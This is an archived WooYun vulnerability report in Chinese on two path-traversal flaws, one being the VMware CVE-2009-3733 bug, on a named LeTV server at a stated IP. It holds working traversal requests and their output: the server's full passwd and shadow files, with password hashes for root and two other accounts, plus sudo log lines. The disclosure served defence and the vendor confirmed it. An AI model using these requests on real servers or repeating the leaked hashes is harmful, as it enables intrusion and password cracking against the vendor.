当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-040484

漏洞标题:乐视网某服务器的CVE-2009-3733漏洞(root权限)

相关厂商:乐视网

漏洞作者: 霍大然

提交时间:2013-10-21 10:37

修复时间:2013-12-05 10:37

公开时间:2013-12-05 10:37

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-10-21: 细节已通知厂商并且等待厂商处理中
2013-10-21: 厂商已经确认,细节仅向厂商公开
2013-10-31: 细节向核心白帽子及相关领域专家公开
2013-11-10: 细节向普通白帽子公开
2013-11-20: 细节向实习白帽子公开
2013-12-05: 细节向公众公开

简要描述:

其实就是两个任意文件读取,其中一个是vmware的CVE-2009-3733

详细说明:

服务器IP:
http://123.126.33.181
这个网站打开的话只有一个测试页面:OK
一、一个目录遍历

Request:
GET //../../../../../../../../etc/passwd HTTP/1.1
Host: 123.126.33.181
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Response:
HTTP/1.1 200 OK
Date: Sun, 20 Oct 2013 08:31:47 GMT
Connection: keep-alive
Content-Length: 1591
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin puppet:x:500:500::/etc/puppet/:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin lele:x:0:0:lele:/home/lele:/bin/bash zabbix:x:502:502:zabbix:/usr/local/zabbix:/bin/bash
同理:shadow文件:
root:$6$yUr4JmQR$ls6.9ry5VtlShVVNS2EobThM2grdLpIPveeFHL9S8HPXlzuV1CnTWzsKq59OrmISwqa9qNB/PJMzFURxWO5xG1:15687:0:99999:7:::
bin:*:15240:0:99999:7:::
daemon:*:15240:0:99999:7:::
adm:*:15240:0:99999:7:::
lp:*:15240:0:99999:7:::
sync:*:15240:0:99999:7:::
shutdown:*:15240:0:99999:7:::
halt:*:15240:0:99999:7:::
mail:*:15240:0:99999:7:::
uucp:*:15240:0:99999:7:::
operator:*:15240:0:99999:7:::
games:*:15240:0:99999:7:::
gopher:*:15240:0:99999:7:::
ftp:*:15240:0:99999:7:::
nobody:*:15240:0:99999:7:::
dbus:!!:15609::::::
vcsa:!!:15609::::::
rpc:!!:15609:0:99999:7:::
abrt:!!:15609::::::
saslauth:!!:15609::::::
postfix:!!:15609::::::
haldaemon:!!:15609::::::
ntp:!!:15609::::::
avahi:!!:15609::::::
rpcuser:!!:15609::::::
nfsnobody:!!:15609::::::
sshd:!!:15609::::::
puppet:!!:15609:0:99999:7:::
named:!!:15609::::::
tcpdump:!!:15609::::::
oprofile:!!:15609::::::
lele:$6$uOoLyAZ.$dfFEtnzTrbo9FM3LbwIKzI3L43evuszAg1BmGw4QdXoKoOxQ2D19BOt2PCh.tZ9d.23DaZvp/8KJJPpBslADx.:15609:0:99999:7:::
zabbix:$6$j3dAdwlu4u//DZ8h$11FwI1XcmPaHbRE.rhvLbHVfaRxrbK6R3iSdjE2UONRo.VxhdTCoXcyUON3XlXcMnoFZ/moMZA033Hoqw3PW8/:15610:0:99999:7:::


二、VMware的目录遍历

Request:
GET /sdk/../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 123.126.33.181
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*


同样可以得到:

3-1.PNG


一般的遍历很难得到安全日志文件,但这个vmware是可以得到的:

3-2.PNG


启动日志:

3-3.PNG


漏洞证明:

var/log/messages:

3-4.PNG


近期访问日志:

Oct 20 16:49:42 cdn sshd[931]: Connection closed by 117.121.54.22
Oct 20 16:50:56 cdn sudo:   zabbix : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/sbin/ethtool eth0
Oct 20 16:51:38 cdn sudo:   zabbix : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/cat /var/log/messages
Oct 20 16:51:38 cdn sudo:   zabbix : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/cat /var/log/messages
Oct 20 16:51:38 cdn sudo:   zabbix : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/cat /var/log/messages
Oct 20 16:51:38 cdn sudo:   zabbix : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/cat /var/log/messages
Oct 20 16:51:38 cdn sudo:   zabbix : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/cat /var/log/messages
Oct 20 16:51:38 cdn sudo:   zabbix : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/cat /var/log/messages
Oct 20 16:51:38 cdn sudo:   zabbix : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/cat /var/log/messages
Oct 20 16:51:38 cdn sudo:   zabbix : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/cat /var/log/messages
Oct 20 16:51:38 cdn sudo:   zabbix : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/cat /var/log/messages
Oct 20 16:51:38 cdn sudo:   zabbix : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/cat /var/log/messages
Oct 20 16:51:38 cdn sudo:   zabbix : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/cat /var/log/messages
Oct 20 16:54:45 cdn sshd[1379]: Connection closed by 117.121.54.22


用户hash:
lele:$6$uOoLyAZ.$dfFEtnzTrbo9FM3LbwIKzI3L43evuszAg1BmGw4QdXoKoOxQ2D19BOt2PCh.tZ9d.23DaZvp/8KJJPpBslADx.:15609:0:99999:7:::
zabbix:$6$j3dAdwlu4u//DZ8h$11FwI1XcmPaHbRE.rhvLbHVfaRxrbK6R3iSdjE2UONRo.VxhdTCoXcyUON3XlXcMnoFZ/moMZA033Hoqw3PW8/:15610:0:99999:7::

修复方案:

升级;
改密码;

版权声明:转载请注明来源 霍大然@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-10-21 11:34

厂商回复:

感谢挖掘,我们先尽快修复,礼物的事情我来想办法啊。。。

最新状态:

暂无